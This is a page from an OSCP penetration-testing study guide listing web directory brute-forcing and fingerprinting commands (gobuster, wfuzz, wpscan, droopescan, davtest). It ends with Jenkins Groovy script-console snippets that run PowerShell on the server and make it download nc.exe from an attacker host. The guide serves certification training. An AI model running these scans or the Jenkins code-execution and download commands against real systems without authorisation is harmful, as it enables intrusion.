OSCP
Search…
OSCP
All About OSCP
OSCP- One Page Repository
About the Author
Basic Linux & Windows Commands
Recon (Scanning & Enumeration)
Active Info Gathering
Common Ports and Services
DNS Zone Transfer Attack
SNMP Enumeration
SMB Enumeration
Web Application Directory bruteforcing / fingerprinting
Port & Services Scanning
Web Application
Brute Force
Shells
Transferring files
Priv Escalation
Post Exploitation
Pivoting
Buffer Overflow
Main Tools
MISC
CheatSheet (Short)
OSCP/ Vulnhub Practice learning
Powered By GitBook
Web Application Directory bruteforcing / fingerprinting

Gobuster

gobuster -u http://ip -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
gobuster -u http://ip/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
gobuster -s "200,204,301,302,307,403,500" -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://
gobuster -s "200,204,301,302,307,403,500" -u http://XXXX -w
gobuster -u http://ip -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40
Gobuster comprehensive directory busting
gobuster -s 200,204,301,302,307,403 -u iop -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
Gobuster quick directory busting
gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
​

Wfuzz

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=1 27.0.0.1:FUZZ
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ
​
Nmap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
​
Robot.txt audit
parsero -u http://X
​
Banner Grabbing
nc -v ip port
​
CMSmap
cmsmap.py https://x.x.x.x
​

Wordpress Scan WpScan

wpscan -u ip/wp/
​

Drupal Scan

droopescan scan -u $ip

Webdav

Webdav
Test incorrect permissions:
​
$ cadaver http://$ip
$ davtest http://$ip
​
Jenkins Script
Jenking groovy code
Testing to see if we have code execution…
​
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'powershell.exe $PSVERSIONTABLE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Nc Upload in Jenkins Server
NC upload in jenkin Server
​
def process = "powershell -command Invoke-WebRequest 'http://ip/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Previous
SMB Enumeration
Next
Port & Services Scanning
Last modified 2yr ago
Copy link
On this page
Gobuster
Wfuzz
Wordpress Scan WpScan
Drupal Scan
Webdav